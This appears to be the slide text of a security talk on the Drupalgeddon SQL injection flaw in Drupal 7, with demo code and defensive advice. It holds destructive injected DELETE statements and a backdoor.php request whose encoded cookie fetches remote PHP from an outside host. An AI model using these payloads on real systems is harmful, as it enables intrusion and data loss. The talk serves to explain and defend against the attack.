I Survived Drupalgeddon

I'm Matt Korostoff

I work for FFW

(and you should too)

Some Background

The Problem

A normal query

<?php

//A normal database query: one placeholder, one scalar argument
$nid = 123;
db_query(
  "SELECT title FROM {node} WHERE nid = :nid",
  array(':nid' => $nid)
);

A normal query, with multiple arguments

<?php

//One placeholder bound to an array; Drupal expands it for the IN clause
$nids = array(123, 456, 489);
db_query(
  "SELECT title FROM {node} WHERE nid IN (:nids)",
  array(':nids' => $nids)
);

A normal query, with multiple arguments, expanded

<?php

//What Drupal builds internally: one placeholder per array element,
//named after the original placeholder plus the element's array key
$nids = array(123, 456, 489);
db_query(
  "SELECT title FROM {node} WHERE nid IN (:nids_0, :nids_1, :nids_2)",
  array(':nids_0' => $nids[0], ':nids_1' => $nids[1], ':nids_2' => $nids[2])
);

A malicious query

<?php
//The array KEYS (not the values) are what end up in the placeholder names,
//and therefore in the SQL text, so attacker-controlled keys become SQL
$nids = array(
  ";DELETE FROM node;" => 123,
  ";DELETE FROM users;" => 456,
  ";DELETE FROM system;" => 489
);

db_query(
  "SELECT title FROM {node} WHERE nid IN (:nids)",
  array(':nids' => $nids)
);
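To trace the malicious query above through the expansion step, here is an added example (not code from these slides or from Drupal core) that re-implements, in miniature, the placeholder expansion Drupal 7 performs for array arguments, once with the pre-7.32 behaviour and once with the fix shipped in 7.32. The function name expand_arguments and the sample arrays are constructed for this illustration.

```php
<?php
/**
 * Expand an array-valued placeholder into ":name_<key>" placeholders.
 *
 * @param string $query   SQL with named placeholders, e.g. "... IN (:nids)".
 * @param array  $args    Placeholder => value map; array values get expanded.
 * @param bool   $patched FALSE: iterate over the caller's keys (pre-7.32).
 *                        TRUE: renumber with array_values() first (7.32 fix).
 * @return array Two elements: the expanded query and the expanded arguments.
 */
function expand_arguments($query, array $args, $patched) {
  foreach ($args as $key => $data) {
    if (!is_array($data)) {
      continue;
    }
    // Pre-7.32 the loop index $i came straight from the caller's array keys,
    // so a key like ";DELETE FROM node;" became part of the placeholder name
    // and thus part of the SQL string. The fix renumbers values 0..n-1.
    $items = $patched ? array_values($data) : $data;
    $new_keys = array();
    foreach ($items as $i => $value) {
      $new_keys[$key . '_' . $i] = $value;
    }
    // Replace the single placeholder with the comma-separated expanded list.
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    unset($args[$key]);
    $args += $new_keys;
  }
  return array($query, $args);
}

// Constructed input: an argument array whose keys carry SQL, as on the slide.
$nids = array(";DELETE FROM node;" => 123, "x" => 456);
$sql  = "SELECT title FROM {node} WHERE nid IN (:nids)";

list($bad_sql, $bad_args)   = expand_arguments($sql, array(':nids' => $nids), FALSE);
list($good_sql, $good_args) = expand_arguments($sql, array(':nids' => $nids), TRUE);

// Unpatched: the array keys are visible inside the SQL text itself.
echo "unpatched: ", $bad_sql, "\n";
// Patched: only numeric suffixes appear; the values stay bound parameters.
echo "patched:   ", $good_sql, "\n";
```

The difference between the two printed strings is the whole vulnerability: prepared statements protect values, but nothing protected the placeholder names that were derived from untrusted keys.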

Hacking time!

We Will:

  • Inject SQL

  • Execute Code

  • Upload files

Step 1.

Insert a row in menu_router

Step 2.

Get arbitrary code execution

Using Backdoor.php

GET /modules/poll/backdoor.php HTTP/1.1
Host: exploited.com
Cookie: Kcqf3=base64_decode;  Kcqf2=cHJlZ19yZXBsYWNl; Kcqf1=ZmlsZV9nZXRfY29udGVudHMoIm1hdHRrb3Jvc3RvZmYuY29tL3VwbG9hZGVyLnBocCIp

Step 3.

Get file upload access

Defending Your Site

Drupal 7.32+
Drupal 8-beta2+

Set proper file permissions

Host with professionals

Acquia
Pantheon
platform.sh
Black Mesh

Take AUTOMATED nightly backups

#Backup database every night at 02:00 into a timestamped dump
0 2 * * * drush @yoursite sql-dump > /path/to/$(date +\%Y\%m\%d\%H\%M\%S).sql

Store your code in version control

Make sure cron is running

#Run cron every two hours, on the hour ("* */2" would run it every minute)
0 */2 * * * drush @yoursite cron

Upgrade to php 5.5+

Automate security patches 

#Without git
0 */2 * * * drush @yoursite up -y --security

#With git (a crontab entry must be a single line)
0 */2 * * * cd /path/to/your/repository/ && drush up --security -y && git commit -am 'Automatic security update' && git push origin master

Drop post traffic in Varnish

#VCL
if (req.request == "POST") {
    error 404 "No";
}


#.htaccess: restrict access to a trusted address (example IP)
Order Deny,Allow
Deny from all
Allow from 123.123.123.123

Was this really "Drupalgeddon"?

Thanks!
